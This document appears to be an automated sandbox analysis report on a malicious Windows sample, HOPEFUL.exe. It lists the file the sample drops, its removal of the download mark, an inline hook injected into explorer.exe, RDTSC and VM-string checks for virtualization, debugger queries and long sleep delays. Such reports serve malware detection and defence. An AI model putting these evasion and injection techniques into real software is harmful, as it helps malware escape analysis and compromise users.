Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: cmmon32.pdb source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: AddInProcess32.exe, 00000005.00000002.342910894.00000000017E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, cmmon32.exe, 00000013.00000002.561037335.0000000004DC0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, cmmon32.exe
Source:	Binary string: AddInProcess32.pdbpw source: HOPEFUL.exe, 00000000.00000003.279597183.0000000001459000.00000004.00000001.sdmp, AddInProcess32.exe, 00000005.00000002.341420581.0000000000DE2000.00000002.00020000.sdmp, cmmon32.exe, 00000013.00000002.563508472.00000000052EF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.313912320.0000000006560000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F005E6 pushfd ; iretd	0_2_02F00613
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F04E9A push es; iretd	0_2_02F05094
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F04B71 push es; iretd	0_2_02F05094
Source: C:\Users\user\Desktop\HOPEFUL.exe	Code function: 0_2_02F00A2A push ds; ret	0_2_02F00A51
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CEB5 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF6C push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF02 push eax; ret	5_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0041CF0B push eax; ret	5_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0186D0D1 push ecx; ret	5_2_0186D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_04E3D0D1 push ecx; ret	19_2_04E3D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDD856 push esi; ret	19_2_00EDD859
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDCEB5 push eax; ret	19_2_00EDCF08
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDCF6C push eax; ret	19_2_00EDCF72
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDCF0B push eax; ret	19_2_00EDCF72
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 19_2_00EDCF02 push eax; ret	19_2_00EDCF08

Source: C:\Users\user\Desktop\HOPEFUL.exe

File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\HOPEFUL.exe

File opened: C:\Users\user\Desktop\HOPEFUL.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE0

Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000EC98E4 second address: 0000000000EC98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: 0000000000EC9B5E second address: 0000000000EC9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\Desktop\HOPEFUL.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe	Window / User API: threadDelayed 851			Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe	Window / User API: threadDelayed 9007			Jump to behavior

Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6816	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6816	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6820	Thread sleep count: 851 > 30	Jump to behavior
Source: C:\Users\user\Desktop\HOPEFUL.exe TID: 6820	Thread sleep count: 9007 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5888	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5888	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 5408	Thread sleep time: -65000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000D.00000000.318372391.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: explorer.exe, 0000000D.00000002.573815285.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000000D.00000000.318661588.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: explorer.exe, 0000000D.00000000.310824417.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: HOPEFUL.exe, 00000000.00000002.298295115.0000000004131000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 0000000D.00000000.317989634.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\HOPEFUL.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_00409A90 rdtsc

5_2_00409A90

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 5_2_0040ACD0 LdrLoadDll,

5_2_0040ACD0

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184A185 mov eax, dword ptr fs:[00000030h]	5_2_0184A185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183C182 mov eax, dword ptr fs:[00000030h]	5_2_0183C182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]	5_2_01842581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]	5_2_01842581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]	5_2_01842581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842581 mov eax, dword ptr fs:[00000030h]	5_2_01842581
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]	5_2_01812D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]	5_2_01812D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]	5_2_01812D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]	5_2_01812D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01812D8A mov eax, dword ptr fs:[00000030h]	5_2_01812D8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01842990 mov eax, dword ptr fs:[00000030h]	5_2_01842990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184FD9B mov eax, dword ptr fs:[00000030h]	5_2_0184FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184FD9B mov eax, dword ptr fs:[00000030h]	5_2_0184FD9B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E05AC mov eax, dword ptr fs:[00000030h]	5_2_018E05AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E05AC mov eax, dword ptr fs:[00000030h]	5_2_018E05AC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018461A0 mov eax, dword ptr fs:[00000030h]	5_2_018461A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018461A0 mov eax, dword ptr fs:[00000030h]	5_2_018461A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018435A1 mov eax, dword ptr fs:[00000030h]	5_2_018435A1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018969A6 mov eax, dword ptr fs:[00000030h]	5_2_018969A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]	5_2_01841DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]	5_2_01841DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01841DB5 mov eax, dword ptr fs:[00000030h]	5_2_01841DB5
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]	5_2_018951BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]	5_2_018951BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]	5_2_018951BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018951BE mov eax, dword ptr fs:[00000030h]	5_2_018951BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]	5_2_01896DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]	5_2_01896DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]	5_2_01896DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896DC9 mov ecx, dword ptr fs:[00000030h]	5_2_01896DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]	5_2_01896DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01896DC9 mov eax, dword ptr fs:[00000030h]	5_2_01896DC9
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]	5_2_0181B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]	5_2_0181B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181B1E1 mov eax, dword ptr fs:[00000030h]	5_2_0181B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018A41E8 mov eax, dword ptr fs:[00000030h]	5_2_018A41E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182D5E0 mov eax, dword ptr fs:[00000030h]	5_2_0182D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182D5E0 mov eax, dword ptr fs:[00000030h]	5_2_0182D5E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]	5_2_018DFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]	5_2_018DFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]	5_2_018DFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DFDE2 mov eax, dword ptr fs:[00000030h]	5_2_018DFDE2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018C8DF1 mov eax, dword ptr fs:[00000030h]	5_2_018C8DF1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]	5_2_01819100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]	5_2_01819100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819100 mov eax, dword ptr fs:[00000030h]	5_2_01819100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]	5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]	5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]	5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01834120 mov eax, dword ptr fs:[00000030h]	5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01834120 mov ecx, dword ptr fs:[00000030h]	5_2_01834120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181AD30 mov eax, dword ptr fs:[00000030h]	5_2_0181AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018DE539 mov eax, dword ptr fs:[00000030h]	5_2_018DE539
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01823D34 mov eax, dword ptr fs:[00000030h]	5_2_01823D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018E8D34 mov eax, dword ptr fs:[00000030h]	5_2_018E8D34
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184513A mov eax, dword ptr fs:[00000030h]	5_2_0184513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184513A mov eax, dword ptr fs:[00000030h]	5_2_0184513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0189A537 mov eax, dword ptr fs:[00000030h]	5_2_0189A537
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]	5_2_01844D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]	5_2_01844D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01844D3B mov eax, dword ptr fs:[00000030h]	5_2_01844D3B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01853D43 mov eax, dword ptr fs:[00000030h]	5_2_01853D43
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183B944 mov eax, dword ptr fs:[00000030h]	5_2_0183B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183B944 mov eax, dword ptr fs:[00000030h]	5_2_0183B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01893540 mov eax, dword ptr fs:[00000030h]	5_2_01893540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01837D50 mov eax, dword ptr fs:[00000030h]	5_2_01837D50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181C962 mov eax, dword ptr fs:[00000030h]	5_2_0181C962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181B171 mov eax, dword ptr fs:[00000030h]	5_2_0181B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0181B171 mov eax, dword ptr fs:[00000030h]	5_2_0181B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183C577 mov eax, dword ptr fs:[00000030h]	5_2_0183C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0183C577 mov eax, dword ptr fs:[00000030h]	5_2_0183C577
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01819080 mov eax, dword ptr fs:[00000030h]	5_2_01819080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01893884 mov eax, dword ptr fs:[00000030h]	5_2_01893884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_01893884 mov eax, dword ptr fs:[00000030h]	5_2_01893884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0182849B mov eax, dword ptr fs:[00000030h]	5_2_0182849B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018420A0 mov eax, dword ptr fs:[00000030h]	5_2_018420A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_018590AF mov eax, dword ptr fs:[00000030h]	5_2_018590AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184F0BF mov ecx, dword ptr fs:[00000030h]	5_2_0184F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0184F0BF mov eax, dword ptr fs:[00000030h]	5_2_0184F0BF
